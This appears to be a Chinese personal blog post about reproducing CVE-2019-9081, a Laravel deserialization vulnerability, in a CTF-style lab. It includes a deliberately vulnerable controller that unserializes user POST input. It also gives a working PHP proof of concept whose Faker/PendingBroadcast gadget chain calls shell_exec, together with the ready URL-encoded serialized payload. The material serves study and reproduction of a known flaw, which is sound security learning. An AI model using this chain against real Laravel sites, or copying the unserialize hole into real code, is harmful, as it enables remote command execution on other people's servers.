cve-2019-9081-recurrence

cve-2019-9081-recurrence

最近翔哥问了关于cve-2019-9081的复现问题。

参考的资料:

https://www.bilibili.com/video/BV1eX4y1F7bt/?spm_id_from=333.999.0.0&vd_source=cdd18b27eaae23edd6c77017f7ce08b4

https://blog.csdn.net/qq_46918279/article/details/120519297

0x00 预备知识

​ yii与Laravel都是简洁、优雅的PHP Web开发框架(PHP Web Framework)。而composer是PHP的包管理、包依赖关系管理工具,有了它,我们就很轻松一个命令就可以把他人优秀的代码用到我们的项目中来,而且很容易管理依赖关系,更新删除等操作也很轻易的实现。(ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架)

0x01 一些bug

​ 就是按照上述参考资料的视频一步步地做,克服万难。其中一个小问题就是controller与route的书写,参考链接如下:

https://www.php.cn/phpkj/laravel/492215.html

​ 相关代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
// AdminController.php
<?php
namespace App\Http\Controllers;

use Illuminate\Http\Request;
use Illuminate\Routing\Controller;

class AdminController extends Controller{

    public function getPostIndex(Request $request){
        if ($request->isMethod('GET')){
            echo "<input type=\"hidden\" name=\"_token\" value=\"" . csrf_token() . "\">";
            return 'post ctfshow to unserialize';
        }
        if ($request->isMethod('POST')){
            echo "enter";
            $data = $request->input('ctfshow');
            $res = unserialize($data);
        }
    }
}

​ 并在routes/web.php下加入:

1
Route::match(['GET', 'POST'], '/admin', 'AdminController@getPostIndex');

0x02 总结&poc

​ 其实学到的远比博客中多得多,最耗时的就是在于沉下心来一个一个的试。总结了一下,链子不长。

image-20221212170015031

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
// poc.php
<?php
namespace Faker;

class DefaultGenerator{
    protected $default;
    function __construct(){
        $this->default = 'calc';
    }
}

class ValidGenerator{
    protected $generator;
    protected $validator;
    protected $maxRetries;
    function __construct(){
        $this->generator = new DefaultGenerator();
        $this->validator = 'shell_exec';
        $this->maxRetries = 1;
    }
}
namespace Illuminate\Broadcasting;
use Faker\ValidGenerator;
class PendingBroadcast{
    protected $events;
    protected $event;

    function __construct(){
        $this->events = new ValidGenerator();
        $this->event = 'good!';
    }
}

echo urlencode(serialize(new PendingBroadcast()));
?>

输出

1
O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A20%3A%22Faker%5CValidGenerator%22%3A3%3A%7Bs%3A12%3A%22%00%2A%00generator%22%3BO%3A22%3A%22Faker%5CDefaultGenerator%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A4%3A%22calc%22%3B%7Ds%3A12%3A%22%00%2A%00validator%22%3Bs%3A10%3A%22shell_exec%22%3Bs%3A13%3A%22%00%2A%00maxRetries%22%3Bi%3A1%3B%7Ds%3A8%3A%22%00%2A%00event%22%3Bs%3A5%3A%22good%21%22%3B%7D

0x02 另一条链子

​ 自己自己找一找有没有别的链子。

​ To be continued.

留言

2022-12-11

© 2024 wd-z711

⬆︎TOP